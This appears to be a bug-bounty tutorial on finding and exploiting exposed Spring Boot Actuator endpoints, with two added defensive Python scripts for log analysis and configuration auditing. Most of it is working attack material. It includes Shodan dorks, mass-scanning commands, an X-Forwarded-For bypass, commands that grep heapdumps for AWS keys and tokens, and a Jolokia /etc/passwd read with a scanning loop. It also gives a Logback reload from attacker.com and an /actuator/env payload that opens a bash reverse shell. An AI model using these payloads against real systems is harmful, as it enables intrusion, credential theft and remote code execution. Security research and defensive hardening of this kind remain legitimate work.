Actuator Unleashed: A Guide to Finding and Exploiting Spring Boot Actuator Endpoints
A hands-on walkthrough to find, test and exploit Actuator endpoints for bug hunters.

Spring Boot Actuator is a developer's best friend. It provides powerful, production-ready features for monitoring and managing applications with minimal effort. Through a series of HTTP endpoints, developers can check application health, view metrics, understand configurations and much more. However, when misconfigured and exposed to the public internet, this helpful tool can turn into a critical security vulnerability, offering a backdoor for attackers.
In this article I explore the methods used by security researchers and attackers to discover, enumerate and exploit these exposed actuator endpoints.
My testing begins with large-scale scanning and fingerprinting to locate Spring Boot instances and determine whether their Actuator management endpoints are exposed to the internet.
Internet-wide scanners such as Shodan accelerate reconnaissance. I often fingerprint Spring Boot apps by matching the default favicon hash. Shodan dorks like the following narrow the search to hosts tied to a specific organization:
org:target_org http.favicon.hash:116323821
ssl:"example.com" http.favicon.hash:116323821
ssl.cert.subject.CN:"*.example.com" http.favicon.hash:116323821
hostname:"example.com" http.favicon.hash:116323821
ssl.cert.subject.CN:"example.com" http.favicon.hash:116323821
These filters return hosts tied to the target that present the default Spring Boot favicon, giving me a quick initial target list.

Once I have a list of potential targets, the next step is to verify the presence of Actuator endpoints. To do this, I use a combination of tools to fuzz and probe for common paths.
Nuclei is a fast, template-based scanner that runs reusable YAML checks across multiple hosts in parallel.
cat act.txt | nuclei -tags actuator -c 50
cat act.txt | nuclei -tags jolokia -es info,low -silent
dirsearch is a classic tool for discovering web content. A specialized wordlist, such as the Spring Boot list from SecLists, makes it far more effective.
dirsearch -l target.txt -w /Seclist/Discovery/Web-Content/spring-boot.txt -x 404 -o output.txt
httpx is a fast, multi-purpose HTTP toolkit, well suited to probing many hosts for specific endpoints.
cat targets.txt | httpx-toolkit -silent -threads 50 -path '/actuator,/actuator/health,/actuator/info' -mc 200,401,403,302 > actuators.txt
The -mc filter keeps responses with status 200, 401, 403 or 302; any of these confirms the endpoint exists and is reachable, even when access is denied. An example of a found live endpoint looks like this:

Finding an endpoint is only step one. The real value is what the endpoint exposes. I focus on enumerating sensitive endpoints and testing common protections.
In my assessments, I prioritize certain endpoints because of the high-impact data they can expose:
Often, sensitive endpoints are protected by a WAF or a reverse proxy that restricts access to internal IPs. However, these protections can sometimes be bypassed by tricking the application into thinking the request is internal. This can be done by spoofing HTTP headers like X-Forwarded-For.
GET /actuator/env HTTP/1.1
Host: example.com
X-Forwarded-For: 127.0.0.1
Small URL tweaks can also cause servers or proxies to respond differently, which is useful for bypasses.
Try different verbs:
Proxy-related headers:
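As an added, defender-side example that is not part of the original post, this Python script reads proxy access logs for the patterns described above: one client enumerating several management paths, a sensitive endpoint answering 200, and an X-Forwarded-For value claiming a loopback or private origin. The log format and sample lines are constructed; it assumes the edge proxy logs the client-supplied X-Forwarded-For value as the last quoted field.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample lines (assumption: combined-log style with the client-supplied
# X-Forwarded-For value logged as the last quoted field).
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2024:12:00:02 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "-"
203.0.113.7 - - [10/May/2024:12:00:03 +0000] "GET /actuator/env HTTP/1.1" 403 0 "-" "-"
203.0.113.7 - - [10/May/2024:12:00:04 +0000] "GET /actuator/env HTTP/1.1" 200 9182 "-" "127.0.0.1"
203.0.113.7 - - [10/May/2024:12:00:05 +0000] "GET /actuator/heapdump HTTP/1.1" 200 83886080 "-" "127.0.0.1"
198.51.100.2 - - [10/May/2024:12:00:06 +0000] "GET /login HTTP/1.1" 200 2048 "-" "-"
"""
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<xff>[^"]*)"$'
)
SENSITIVE = {"env", "heapdump", "jolokia"}  # endpoints the article flags as high impact
# Ranges a public edge should never see claimed as the forwarded origin.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "::1/128")]

def claims_internal(xff):
    """True if the first X-Forwarded-For hop claims a loopback or private address."""
    first = xff.split(",")[0].strip()
    try:
        addr = ipaddress.ip_address(first)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)

def analyze(log_text, base_path="/actuator", enum_threshold=3):
    """Return (client_ip, reason, detail) tuples for management-path activity."""
    findings = []
    paths_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["path"].startswith(base_path):
            continue
        ip, path, status = m["ip"], m["path"].split("?")[0], int(m["status"])
        endpoint = path[len(base_path):].strip("/").split("/")[0]  # e.g. "env"
        paths_by_ip[ip].add(path)
        if endpoint in SENSITIVE and status == 200:
            findings.append((ip, "sensitive endpoint served", path))
        if claims_internal(m["xff"]):  # external client arrived claiming to be internal
            findings.append((ip, "spoofed X-Forwarded-For", path))
    for ip, paths in paths_by_ip.items():
        if len(paths) >= enum_threshold:
            findings.append((ip, "actuator enumeration", f"{len(paths)} paths"))
    return findings
```

Pass a non-default base_path if the application has moved its management endpoints; a 403 on a sensitive path is deliberately not reported, since that is the protection working.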
Once I gain access to a sensitive endpoint, the final step is to demonstrate the potential impact of the exposure.
The /actuator/heapdump endpoint returns a gzipped binary file that can be a goldmine for credentials. The strings command combined with grep is a simple yet powerful way to sift through this data for known patterns, such as AWS access key IDs, which often start with “AKIA”.
# Download the heapdump first
wget http://target.com/actuator/heapdump
strings heapdump | grep -B 2 -A 2 "AKIA"
The -B (before) and -A (after) flags provide context around the key, which may reveal the corresponding secret key and demonstrate a critical data leak.
strings -a -n 6 heapdump | grep -Eo 'AKIA[0-9A-Z]{16}' | sort -u > aws_keys.txt
strings -a -n 10 heapdump | grep -Eo '[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+' | sort -u > jwt_candidates.txt
strings -a -n 10 heapdump | grep -Eo '[A-Za-z0-9_\-]{20,}' | sort -u > long_token_candidates.txt
strings -a -n 6 heapdump.hprof | grep -Ei 'password|passwd|pwd|secret|api[_-]?key|token|auth|authorization|bearer|aws|AKIA|ssh-rsa' -n > possible_secrets.txt
You can also load the dump in VisualVM to inspect memory usage, identify objects and locate sensitive data.


From a security perspective, the /actuator/jolokia endpoint is one of the most critical. It exposes JMX MBeans, which can be used to interact with the underlying application server.
Certain MBeans can be abused to read files from the server's filesystem. This PoC uses the DiagnosticCommand MBean to read /etc/passwd.
http://domain.com/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
Note: The path /etc/passwd is encoded as !/etc!/passwd for the Jolokia exec payload.
#!/bin/bash
# Reads one host per line from ip_list.txt and saves the response for any host that answers
while read -r ip; do
    echo "Testing: $ip"
    response=$(curl -s -m 10 "http://$ip/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd")
    if echo "$response" | grep -q "root:"; then
        echo "VULNERABLE: $ip"
        echo "$response" > "vulnerable_$ip.txt"
    fi
done < ip_list.txt
A classic RCE vector through Jolokia involves the Logback JMXConfigurator. An attacker can instruct the application to reload its logging configuration from a malicious, attacker-controlled URL.
http://domain.com/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/attacker.com!/logback.xml
The next request targets a writable /actuator/env endpoint instead:
curl -X POST "http://ip/actuator/env" \
  -H "Content-Type: application/json" \
  -d '{
    "name":"spring.datasource.hikari.connection-test-query",
    "value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd}); return "done"; }'; CALL EXEC('bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1');"
  }'
Remember to start your listener first: nc -lvnp YOUR_PORT
To speed up these checks I often rely on open-source Burp Suite extensions that automate repetitive discovery and validation tasks.
Preventing this entire class of vulnerabilities comes down to following security best practices:
Move the default base path /actuator to something non-standard via the management.endpoints.web.base-path property.
If you do not need endpoints such as /heapdump or /jolokia in production, turn them off completely.
By understanding how these endpoints are abused, developers and security teams can take proactive steps to ensure their applications remain secure.
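As an added example that is not from the original post, this Python audit reads a Spring Boot application.properties file, works out which Actuator endpoints would be reachable over HTTP (exposure.include and exposure.exclude, with exclude winning, plus the per-endpoint enabled flags) and reports the settings the advice above targets. The two property sets are constructed: one typical weak configuration and one hardened one.

```python
# Endpoint ids that leak configuration, memory or JMX access when reachable.
RISKY = {"env", "heapdump", "jolokia", "beans", "configprops", "mappings", "shutdown"}

# Constructed property sets: a typical weak configuration and a hardened one.
WEAK = """
management.endpoints.web.exposure.include=*
"""
HARDENED = """
management.server.port=8081
management.endpoints.web.base-path=/internal-mgmt
management.endpoints.web.exposure.include=health,info
management.endpoints.web.exposure.exclude=env,heapdump,jolokia
management.endpoint.heapdump.enabled=false
management.endpoint.jolokia.enabled=false
"""

def load_properties(text):
    """Parse key=value lines; comments and blanks are skipped."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith(("#", "!")) and "=" in line:
            key, _, value = line.partition("=")
            props[key.strip()] = value.strip()
    return props

def _csv(value):
    return {v.strip() for v in value.split(",") if v.strip()}

def audit(text):
    """Return a list of findings; an empty list means nothing to fix."""
    p = load_properties(text)
    findings = []
    include = _csv(p.get("management.endpoints.web.exposure.include", "health"))
    exclude = _csv(p.get("management.endpoints.web.exposure.exclude", ""))
    exposed = set(RISKY) if "*" in include else include & RISKY
    exposed = set() if "*" in exclude else exposed - exclude  # exclude wins over include
    if "*" in include:
        findings.append("exposure.include=* exposes every endpoint over HTTP")
    default_on = p.get("management.endpoints.enabled-by-default", "true").lower() == "true"
    base = p.get("management.endpoints.web.base-path", "/actuator")
    for ep in sorted(exposed):
        enabled = p.get(f"management.endpoint.{ep}.enabled", str(default_on)).lower() == "true"
        if enabled:
            findings.append(f"{base}/{ep} is exposed and enabled; disable it or exclude it")
    if base == "/actuator":
        findings.append("default base path /actuator; set management.endpoints.web.base-path")
    if "management.server.port" not in p:
        findings.append("management endpoints share the application port; set management.server.port")
    return findings
```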
Spring Boot Actuator is a fantastic tool for developers, but it carries significant risk if exposed. As I've shown, misconfigured endpoints can lead to severe data leaks or even full remote code execution. The key to security is deliberate configuration and proactive monitoring. By understanding how these endpoints can be tested and secured, your development and security teams can take the necessary steps to keep your applications safe.